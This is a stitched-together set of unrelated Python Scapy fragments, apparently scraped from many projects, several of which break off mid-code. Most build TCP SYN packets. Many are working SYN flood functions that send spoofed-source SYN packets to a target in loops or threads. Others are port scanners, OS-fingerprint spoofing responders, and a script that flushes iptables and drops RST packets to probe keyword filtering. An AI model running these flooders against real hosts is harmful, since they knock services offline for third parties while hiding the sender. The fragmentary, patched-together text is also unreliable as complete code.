def service_craft(pkt, fp, mac, service, type_=False): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.ttl, 16) ip.flags = 0x4000 tcp = TCP() tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport if type_: tcp.flags = 0x018 # PSH / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].ack data = service[pkt[TCP].dport] fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data return fin_pkt else: tcp.flags = 0x012 # SYN / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].seq + 1 fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def ecn_craft(pkt, mac, fp): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['ECN']['TTL'], 16) ip_flag = fp.probe['ECN']['DF'] if ip_flag == 'Y': ip.flags = 2 else: ip.flags = 0 ip.id = fp.ip_id_gen() tcp = TCP() w_val = fp.probe['ECN']['W'] if w_val == 'ECHOED': tcp.window = pkt[TCP].window else: tcp.window = w_val tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport cc_val = fp.probe['ECN']['CC'] if cc_val == 'Y': tcp.flags = 0x52 elif cc_val == 'N': tcp.flags = 0x12 elif cc_val == 'S': tcp.flags = 0xD2 else: tcp.flags = 0x10 o_val = fp.probe['ECN']['O'] if o_val == 'EMPTY': pass else: tcp.options = o_val fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def run(self): # Damn, ugly! global forging if forging: i = IP() i.dst = ip if spoofing: i.src = '.'.join( random.randint(1, 254) for _ in range(4)) t = TCP() t.sport = random.randint(1, 65535) t.dport = port t.flags = 'S' try: send(i / t, verbose=0) except PermissionError: print('ohno, not forging') forging = False else: s = socket.socket() s.connect((self.ip, self.port))
def doSynFlood(origin_ip=None, origin_port=None, target_ip=None, target_port=None, interface=None, duration=None, gap=0): ''' Starts Syn Flood attacks Arguments: origin_ip (str): attacker ip origin_port (int): attacker port target_ip (str): target ip target_port (int): target port interface (str): network interface to use duration (int): duration of the attack gap (int): gap (delay) between packets Returns: None ''' # Check if everything is filled out if target_ip is None: return if target_port is None: return if duration is None: return if gap >= duration: return # Prepare the packet ip_layer = IP() ip_layer.src = origin_ip ip_layer.dst = target_ip tcp_layer = TCP() tcp_layer.sport = origin_port tcp_layer.dport = target_port tcp_layer.flags = "S" # Prepare timings time_start = time() time_end = time_start + duration # Start attack while (time() <= time_end): #duration # Constantly changing values tcp_layer.seq = GenerateRandomSafeSeq() tcp_layer.ack = GenerateRandomSafeSeq() tcp_layer.window = GenerateRandomWindow() attack_packet = ip_layer/tcp_layer # packet to send send(attack_packet, iface=interface) if gap > 0: sleep(gap) #gap
def seqgen_pkt_craft(pkt, fp, mac, pno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['T1']['TTL'], 16) ip.flags = fp.probe['T1']['DF'] ip.id = fp.ip_id_gen() tcp = TCP() s_val = fp.probe['T1']['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = fp.tcp_seq_gen() a_val = fp.probe['T1']['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe['T1']['F'] tcp.flags = flag_val tcp.window = fp.probe['WIN']['W' + pno] tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport tcp.options = fp.probe['OPS']['O' + pno] rd_val = fp.probe['T1']['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def configureTCPPacket(port): TCP_Packet = TCP() TCP_Packet.dport = port TCP_Packet.flags = "S" # SYN TCP_Packet.seq = getRand() TCP_Packet.sport = getRand() TCP_Packet.window = getRand() return TCP_Packet
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254)) i.dst = self.target t = TCP() t.dport = self.port t.flags='S' print "Spoofing %s to send SYN ..." % i.src sr1(i/t,verbose=0)
def syn_flood(self, target, port): from scapy.all import IP, TCP, send i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = target t = TCP() t.sport = random.randint(1, 65500) t.dport = port t.flags = 'S' send(i / t, verbose=0)
def run(self): i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = self.target t = TCP() t.sport = random.randint(1, 65535) t.dport = self.port t.flags = 'S' send(i / t, verbose=0)
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = self.target t = TCP() t.dport = self.port t.flags = 'S' print "Spoofing %s to send SYN ..." % i.src sr1(i / t, verbose=0)
def run(self): i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = target t = TCP() t.sport = random.randint(1, 65535) t.dport = port t.flags = 'S' send(i/t, verbose=0)
def main(): os.system("sudo iptables -F") # This one drops all (anywhere source and destination) #os.system("sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP") # Drop all from source localhost os.system( "sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 127.0.0.1 -j DROP" ) # Drop all from source 10.0.2.15 that is my IP address (ifconfig) os.system( "sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 10.0.2.15 -j DROP" ) os.system("sudo iptables -L") # This is required for traffic to localhost conf.L3socket = L3RawSocket my_ip = IP(dst="www.baiwanzhan.com") my_tcp = TCP(dport=80) syn = my_ip / my_tcp syn_ack = sr1(syn) # client send SYN and receive SYN/ACK my_tcp = TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq + 1, flags='A') send(my_ip / my_tcp) # send ACK to complete the 3-way TCP handshake my_tcp.flags = 'AP' #my_tcp.show() #get_str = "GET /service/site/search.aspx?query=法" get_str = "GET /service/site/search.aspx?query=wa" request = my_ip / my_tcp / get_str reply = sr1(request) print get_str #get_str = "轮 HTTP/1.1\r\n" \ get_str = "ter HTTP/1.1\r\n" \ "Host: www.baiwanzhan.com\r\n\r\n" my_tcp = TCP(dport=80, sport=reply[TCP].dport, seq=reply[TCP].ack, ack=reply[TCP].seq + 1, flags='AP') request = my_ip / my_tcp / get_str reply = sr1(request) #send(request) print get_str
def _send(self, **kwargs): """Every packet we send should go through here.""" load = kwargs.pop('load', None) flags = kwargs.pop('flags', "") packet = TCP(dport=self.dest_port, sport=self.src_port, seq=self.seq, ack=self.last_ack_sent, **kwargs) # Always ACK unless it's the first packet if self.state == "CLOSED": packet.flags = flags else: packet.flags = flags + "A" # Add the IP header full_packet = self.ip_header / packet # Add the payload full_packet.load = load # Send the packet over the wire self.listener.send(full_packet) # Update the sequence number with the number of bytes sent if load is not None: self.seq += len(load)
def run(self): packet_ip = IP() packet_ip.src = "{}.{}.{}.{}".format(random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) packet_ip.dst = self.host packet_tcp = TCP() packet_tcp.sport = random.randint(1024, 65535) packet_tcp.dport = self.port packet_tcp.flags = 'S' send(packet_ip/packet_tcp)
def main(): os.system("sudo iptables -F") # This one drops all (anywhere source and destination) #os.system("sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP") # Drop all from source localhost os.system( "sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 127.0.0.1 -j DROP" ) # Drop all from source 10.0.2.15 that is my IP address (ifconfig) os.system( "sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -s 10.0.2.15 -j DROP" ) os.system("sudo iptables -L") # This is required for traffic to localhost conf.L3socket = L3RawSocket my_ip = IP(dst="www.baiwanzhan.com") #my_ip = IP(dst="www.google.com") my_tcp = TCP(dport=80) syn = my_ip / my_tcp syn_ack = sr1(syn) # client send SYN and receive SYN/ACK my_tcp = TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq + 1, flags='A') send(my_ip / my_tcp) # send ACK to complete the 3-way TCP handshake my_tcp.flags = 'AP' #my_tcp.show() #get_str = "GET / HTTP/1.1\r\nHost: www.google.com \r\n\r\n" #get_str = "GET /service/site/search.aspx?query=法轮 HTTP/1.1\r\n" \ get_str = "GET /service/site/search.aspx?query=方法 HTTP/1.1\r\n" \ "Host: www.baiwanzhan.com\r\n" \ "\r\n" # "User-Agent: Python-Scapy\r\n" \ # "Accept:*/*\r\n" \ # "Connection: keep-alive\r\n" \ print get_str request = my_ip / my_tcp / get_str #send(request) ans, unans = sr(request) ans.summary() unans.summary()
def sendSYN(host, port): # Create an IP Packet using random ip as source and the target IP as destination ipPacket = IP() ipPacket.src = ".".join( map(str, (random.randint(0, 255) for i in range(4)))) ipPacket.dst = host # Create a TCP segment using a random source port and the target port as the destination tcpSegment = TCP() tcpSegment.sport = random.randint(1000, 65535) tcpSegment.dport = port # Set the syn flag tcpSegment.flags = 'S' # Send the composition of the two (package/segment) and ignore the result send(ipPacket / tcpSegment, verbose=0) pass
def is_port_open(ip_addr, port, timeout=5, verbose=False): ip = IP() ip.dst = ip_addr syn = TCP() syn.sport = choice(range(1000, 50000)) syn.dport = port syn.flags = 'S' syn.seq = 1 packet = ip/syn synack = sr1(packet, timeout=timeout, verbose=verbose) if synack and synack.sprintf('%TCP.flags%') == 'SA': return True return False
def flood(target): IP_Packet = IP() IP_Packet.src = randomData.random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose = False) except Exception as e: print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}") else: print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
def syn_flood(ip_destination, port_destination, limit): total = 0 print("Enviando Pacotes") for x in range(0, limit): ip_packet = IP() ip_packet.src = ".".join( map(str, (random.randint(0, 255) for _ in range(4)))) ip_packet.dst = ip_destination tcp_packet = TCP() tcp_packet.sport = random.randint(1000, 9000) tcp_packet.dport = port_destination tcp_packet.flags = "S" tcp_packet.seq = random.randint(1000, 9000) tcp_packet.window = random.randint(1000, 9000) print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport)) send(ip_packet / tcp_packet, verbose=0) total += 1 print("All packets sent")
def syn_flood(): global FINISH while True: if FINISH: break IP_Packet = IP() IP_Packet.src = randomData.random_IP() IP_Packet.dst = target_ip TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target_port TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print(e) else: print("[+] SYN packet sent!")
def server_tcp(self, flags, payload=b"", count=True): data_length = max(len(payload), 1) tcp = TCP() tcp.flags = flags tcp.sport = self.service tcp.dport = self.client_port tcp.seq = self.ss tcp.ack = self.sa if count: self.ss += data_length self.ca += data_length packet = Ether(src=self.server.mac, dst=self.client.mac) packet /= IP(src=self.server.ip, dst=self.client.ip) packet /= tcp if len(payload) > 0: packet /= payload self.packets.append(packet)
def flood(target): IP_Packet = IP() IP_Packet.src = random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print(f"[{red} bold][✘] ERROR[/{red} bold] " + f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}") else: print(f"[{green}][✔] SUCCESS[/{green}] " + f"[{yellow}]SYN packet sent to[{yellow}] " + f"[{blue}]{'{}:{}'.format(*target)}")
def flood(target): IP_Packet = IP() IP_Packet.src = random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print( f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}" ) else: print( f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m" )
] # try each common port until one responds for port in common_ports: # assemble IP packet with target IP ip = IP() ip.dst = target_ip # assemble TCP with dst port and SYN flag set tcp = TCP() tcp.dport = port tcp.flags = 'S' print 'Trying port %d' % port # send the packet and wait 2 seconds for an answer rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0) # if answered no need to try more ports if rcv_pkt: break # check to see if host responded, quit if otherwise if not rcv_pkt:
# BT Port Scanner - Exercise 6.19 Solution from scapy.all import sr1, IP, TCP print "[BT PORT SCANNER]\n" dest = raw_input("Enter destination IP address: ") for i in range(20, 1025): tcp_seg = TCP(dport=i, sport=2057, flags='S') tcp_packet = IP(dst=dest)/tcp_seg tcp_res = sr1(tcp_packet, timeout=1, verbose=0) if str(type(tcp_res)) == "<type 'NoneType'>": print "[" + str(i) + "] => CLOSED\n" elif tcp_res.haslayer(TCP): if tcp_res.getlayer(TCP).flags == 18: tcp_seg.flags = 'A' tcp_seg.ack = tcp_res.getlayer(TCP).seq + 1 tcp_packet = IP(dst=dest)/tcp_seg tcp_res = sr1(tcp_packet, timeout=1, verbose=0) print "[" + str(i) + "] => OPEN\n" else: print "[" + str(i) + "] => CLOSED\n"
#!/usr/bin/python from scapy.all import IP, TCP a = IP() a.src = "1.2.3.4" a.dst = "10.0.2.15" a.ihl = 5 b = TCP() b.sport = 1551 b.dport = 23 b.seq = 1551 b.flags = 'S' pkt = a/b with open("packet", "wb") as f: f.write(bytes(pkt))
def t2tot7_craft(pkt, fp, mac, tno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe[tno]['TTL'], 16) ip.flags = fp.probe[tno]['DF'] ip.id = random.randint(1, 1000) tcp = TCP() s_val = fp.probe[tno]['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = pkt[TCP].ack + 369 a_val = fp.probe[tno]['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe[tno]['F'] tcp.flags = flag_val w_val = fp.probe[tno]['W'] if w_val == 'ECHOED': tcp.window = pkt[TCP].window else: tcp.window = w_val tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport o_val = fp.probe[tno]['O'] if o_val == 'EMPTY': pass else: tcp.options = o_val rd_val = fp.probe[tno]['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
# TCP SYN if sys.argv[1] == "-t": print "TCP SYN scan on host " + sys.argv[2] + "\n" ip = IP() tcp = TCP() # cast as str and int to avoid issues caused by periods ip.dst = str(sys.argv[2]) # loop iterates through as many commandline arguments were given for port in range(len(sys.argv) - 3): print "Scanning port " + str(sys.argv[port + 3]) # port+3 is start of ports tcp.dport = int(sys.argv[port + 3]) # send SYN packet tcp.flags = "S" packet = (ip / tcp) # verbose=0 to limit console output; timeout 1s status = sr1(packet, verbose=0, timeout=1) if status: print str(packet.dport) + " is open\n" # UDP elif sys.argv[1] == "-u": print "UDP scan on host " + sys.argv[2] + "\n" ip = IP() udp = UDP() # cast as str and int to avoid issues caused by periods ip.dst = str(sys.argv[2]) # loop iterates through as many commandline arguments were given
] # try each common port until one responds for port in common_ports: # assemble IP packet with target IP ip = IP() ip.dst = target_ip # assemble TCP with dst port and SYN flag set tcp = TCP() tcp.dport = port tcp.flags = 'S' print('Trying port %d' % port) # send the packet and wait 2 seconds for an answer rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0) # if answered no need to try more ports if rcv_pkt: break # check to see if host responded, quit if otherwise if not rcv_pkt:
def create_packet(packet_proto=PacketProto.TCP, **kwargs): """Creates network packet of IP and associated TCP or UDP corresponding packets via Scapy :param: packet_proto denotes IP packet layer (protocol) to create, ex: TCP, UDP, ICMP :type: PacketProto :param: flags TCP flags to enabel in packet, ex: 'AFS' :type: str :param: kwargs dictionary for packet creation src = IP address of source sport = IP source port dst = IP address of destination dport = IP destination port src_mac = Ethernet MAC address of source :rtype: dict :return: scapy packet :rtype: pkt :raise: ValidationError if method parameter validation fails """ errors = {} if 'flags' in kwargs and not valid_flags(kwargs.get('flags')): errors["tcp_flags"] = "Invalid TCP flag(s): " + kwargs.get('flags') if 'flags' in kwargs and packet_proto != PacketProto.TCP: errors["flags"] = "Invalid flags cannot be passed non TCP packet" if 'dport' in kwargs and not valid_port(kwargs.get("dport")): errors["dport"] = "Invalid destination port " + str( kwargs.get("dport")) if 'sport' in kwargs and not valid_port(kwargs.get("sport")): errors["sport"] = "Invalid source port " + str(kwargs.get("sport")) if 'src' in kwargs and not valid_ip(kwargs.get("src")): errors["src"] = "Invalid source IP address " + kwargs.get("src") if 'dst' in kwargs and not valid_ip(kwargs.get("dst")): errors["dst"] = "Invalid destination IP address " + kwargs.get("dst") if 'src_mac' in kwargs and not valid_mac(kwargs.get("src_mac")): errors["src_mac"] = "Invalid source MAC address " + kwargs.get( "src_mac") if 'dst' not in kwargs: errors["dst"] = "Destination IP address required" if packet_proto == PacketProto.TCP and 'dport' not in kwargs: errors["tcp_dport"] = "Destination port required for TCP packet" if errors: raise ValidationError("Invalid IP creation", errors) # create scapy packet # pylint: disable=invalid-name ip = IP(dst=kwargs.get("dst")) if 'src' in kwargs: ip.src = kwargs.get("src") LOGGER.debug("Set Src IP " + ip.src) if packet_proto == PacketProto.TCP: tcp = TCP(dport=int(kwargs.get("dport"))) if 'sport' in kwargs: tcp.sport = int(kwargs.get("sport")) tcp.flags = kwargs.get("flags") LOGGER.debug("Set TCP Flags " + str(tcp.flags)) packet = ip / tcp elif packet_proto == PacketProto.UDP: udp = UDP(dport=int(kwargs.get("dport"))) LOGGER.debug("Set UDP Dest Port " + str(udp.dport)) if 'sport' in kwargs: udp.sport = int(kwargs.get("sport")) LOGGER.debug("Set UDP Src Port " + str(udp.sport)) packet = ip / udp elif packet_proto == PacketProto.ICMP: LOGGER.debug("Set ICMP packet") icmp = ICMP() packet = ip / icmp else: errors[ "packet_proto"] = "Invalid packet protocol passed (unrecognized)" raise ValidationError("Invalid IP creation", errors) if 'src_mac' in kwargs: ether = Ether(src=kwargs.get("src_mac")) LOGGER.debug("Set Ethernet MAC Addr " + ether.src) packet = ether / packet LOGGER.debug(packet.show()) return packet
# BT Port Scanner - Exercise 6.19 Solution from scapy.all import sr1, IP, TCP print "[BT PORT SCANNER]\n" dest = raw_input("Enter destination IP address: ") for i in range(20, 1025): tcp_seg = TCP(dport=i, sport=2057, flags='S') tcp_packet = IP(dst=dest) / tcp_seg tcp_res = sr1(tcp_packet, timeout=1, verbose=0) if str(type(tcp_res)) == "<type 'NoneType'>": print "[" + str(i) + "] => CLOSED\n" elif tcp_res.haslayer(TCP): if tcp_res.getlayer(TCP).flags == 18: tcp_seg.flags = 'A' tcp_seg.ack = tcp_res.getlayer(TCP).seq + 1 tcp_packet = IP(dst=dest) / tcp_seg tcp_res = sr1(tcp_packet, timeout=1, verbose=0) print "[" + str(i) + "] => OPEN\n" else: print "[" + str(i) + "] => CLOSED\n"